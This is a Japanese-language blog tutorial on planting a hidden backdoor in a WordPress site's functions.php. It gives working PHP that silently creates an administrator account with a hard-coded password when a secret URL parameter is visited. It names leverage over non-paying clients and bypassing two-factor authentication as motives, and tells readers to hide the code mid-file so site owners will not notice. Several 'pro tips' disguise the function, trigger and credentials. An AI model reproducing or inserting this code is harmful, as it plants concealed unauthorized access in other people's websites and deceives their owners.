WordPress への秘密のバックドア管理者アクセスを作成する方法

WordPress Web サイトを作成したり、クライアントにサービスを提供したりしたのに、報酬が支払われなかったことがありますか? おなじみのように聞こえる場合は、正しい場所に着陸しました。

この状況から身を守るために、WordPress で秘密のバックドア Web サイト アクセスを作成する方法を知っておくと役立つ場合があります。

また、何らかの理由で WordPress Web サイトにアクセスできない場合は、別のバックドア アクセスを使用して制御を取り戻すことができます。

このチュートリアルでは、秘密のバックドア Web サイトへのアクセスと、そのようなアクセスを作成して Web サイトに常にアクセスできるようにする理由について説明します。

最後に、ステップバイステップのガイドとそれに続く倫理的なアドバイスを使用して、作成する方法を示します.

WordPress の秘密のバックドア管理者アクセスとは?

用語が示すように、バックドア アクセスは、通常のログインが機能しない場合に、WordPress Web サイトへの管理者アクセスを回復する方法です。

管理者アカウントを失う方法を知りたいですか?

あなたが WordPress の開発者または代理店である場合、クライアントが支払いを行わない場合に Web サイトを保護するために、作業が完了すると管理者アカウントを削除することがあります。

最悪の場合、ハッカーが Web サイトへの不正アクセスを取得し、管理者パスワードを変更したり、ログインを完全に削除したりする可能性があります。

これが発生した場合は、アクセスを回復する方法が必要です。 ここで、秘密のバックドアが登場します。

バックドア Web サイト アクセスを作成する根本的な理由は何ですか?

WordPress Web サイトへの秘密のバックドア管理者アクセスを作成するいくつかの潜在的な理由があります。

• クライアントから支払いを受けていない場合に管理者アクセスを取り戻すため。
• Web サイトがハッキングされ、管理者アカウントの詳細が変更された場合にアクセスを維持するため。
• ユーザー名やパスワードを覚えなくても、管理パネルに簡単にアクセスできるようにします。
• 2 要素認証などのセキュリティ対策を回避するため。
• 使用している元のパスワードを知らなくても、他のユーザーが Web サイトにアクセスできるようにすること。
• 秘密のバックドア管理者アクセスを作成すると、ユーザー名やパスワードを覚えるのが困難または不便な場合に役立ちます。

ただし、バックドアの作成は、実施されている可能性のあるセキュリティ対策をバイパスするため、セキュリティ リスクになる可能性もあります。

したがって、秘密のバックドア管理者アクセスを作成する前に、長所と短所を比較検討することをお勧めします。

バックドア Web サイト アクセスの作成に関する倫理的アドバイス

他人の Web サイトへの秘密のバックドア アクセスを作成することには、倫理的な意味があります。 作成する前に考慮すべきことは間違いありません。

理由が何であれ、あなたは他人の所有物をいじっていることになるので (彼らがお金を払った後)、バックドアを追加する予定がある場合はその影響について考えてください。

他に選択肢がない限り、Web サイトにバックドアを追加しないことを強くお勧めします。 私はそのような行為について責任を負いません。 正当または法的な理由でのみ使用することをお勧めします。

WordPress パスワード バックドアはどのように機能しますか?

WordPress のバックドアは、WordPress のコア ファイル内で PHP を使用することで機能します。 後で共有するコードは、特定の URL にアクセスしたときに新しい管理者アカウントを作成します。

作成したら、Web サイトにログインして、必要なタスクを実行できます。

functions.php に PHP コード スニペットを登録すると、カスタム クエリを含む URL を使用してトリガーする準備が整います。 URL には、functions.php ファイルの編集中に挿入したキーワードが含まれています。

ここで、関数をトリガーする前にシークレット アカウントが存在するかどうか疑問に思うかもしれません。

答えはノーだ"。 特定のパラメーターを含む URL を使用して関数をトリガーした場合にのみ、新しいユーザー アカウントが作成されます。

秘密のバックドア Web サイト アクセスを作成する方法

次のプロセスには、PHP ファイルの変更が含まれます。 それは完全に安全ですが、最初に正しく取得する必要があります.

これらの指示に正確に従ってください。

潜在的な問題を防ぐために、子テーマを介して functions.php ファイルを編集することをお勧めします。 Astra テーマを使用している場合は、ワンクリックで子テーマを作成できます。

ステップ 1: テーマ ファイル エディターから functions.php ファイルを開く

WordPress のコアファイルである functions.php ファイルを変更します。

• WordPress 管理ダッシュボードに移動します。
• [外観] > [テーマ ファイル エディター] に移動します。

• 次に、右側のサイドバーからfunctions.phpファイルを選択します。

ステップ 2: 次のコードをコピーして functions.php ファイルに貼り付けます。

あとは、この PHP コード スニペットをコピーしてエディターに貼り付けるだけです。

 add_action( 'wp_head', 'my_backdoor' ); function my_backdoor() { if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'mr_admin' ) ) { $user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

コードから、' mr_admin ' という名前の新しい管理者ユーザーが作成され、パスワードが ' pa55w0rd! ' であることがわかります。 '。

これらは必要に応じて変更できます。

• PHP ファイル内の任意の場所にコードを配置します。 理想的には、他の機能の間に。 このコードを挿入していることをサイト管理者や管理者に知らせたくありませんよね? ということで、書類の真ん中下部分に貼り付けています。
• また、 /**のすぐ上または*/マークの直後にコードを貼り付けていることを確認してください。

• 「ファイルの更新」ボタンを押します。

これで、ファイルが更新され、バックドアが配置されます。

ステップ 3: カスタム パラメーターを使用して URL を作成し、管理者アクセスを取得する

その機能をトリガーする必要がある場合、または管理者アクセスを取得する必要がある場合は、ドメインの右側に次のスラッグを追加してください。

「 /?backdoor=go 」

[ここで、 backdoorはキーワードGETの後のクエリ パラメータです]。 より具体的には、次のスクリーンショットを見てください。

したがって、あなたのウェブサイトがwww.xyz.comの場合、バックドア アクセス URL は「 www.xyz.com/?backdoor=go 」になります。

ドメイン名の横にスラッグを追加したら、Enter キーを押します。

バム！ それはそれと同じくらい簡単です！

ここで、 [ユーザー] > [すべてのユーザー]から新しい管理者ユーザー アカウントを確認します。

プロのヒント: よりこっそりとバックドアをカモフラージュする

ヒント 1: パラメータと関数名を変更する

必要に応じて、関数名、コード スニペットのパラメーターを変更できます。

このように、カモフラージュで変装することができます。 これは、キーワード「 backdoor 」を「 pathway 」に変更したカモフラージュ コード スニペットです。

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'mr_admin' ) ) { $user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

これは、 www.xyz.comの URL が「 www.xyz.com/?pathway=go 」になることを意味します。

ヒント 2: ユーザー名を変更する

ユーザー名を変更するには、文字列「 mr_admin 」を「 hellboy 」に置き換えます

add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'hellboy' ) ) { $user_id = wp_create_user( 'hellboy', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

ヒント 3: パスワードの変更

パスワードを変更するには、キーワード「 pa55w0rd! 」と「ヘルパス！ 」。

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'hellboy' ) ) { $user_id = wp_create_user( 'hellboy', 'hell_pass!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

ヒント 4: 新しい URL とスラッグの作成

したがって、関数をトリガーするには、次の URL をキーワード「 pathway 」とともに使用する必要があります。

www.xyz.com/?pathway=go

以上です。 これで、バックドアを作成し、設定をカスタマイズして独自のものにする練習ができました。

今ではあなたの番です！

秘密のバックドア Web サイトへのアクセスを追加することは、安易に行うべきではないことに注意してください。 しかし、それを行う必要がある場合は、その方法がわかりました。

Web サイトへのアクセスを回復する必要がある理由に関係なく、これは最も簡単な方法の 1 つです。

これらの手順のいずれかで行き詰まっている場合は、下のコメント セクションに気軽に連絡してください。

また、私の Facebook コミュニティに参加して、私の最新ニュースに遅れないようにすることもできます!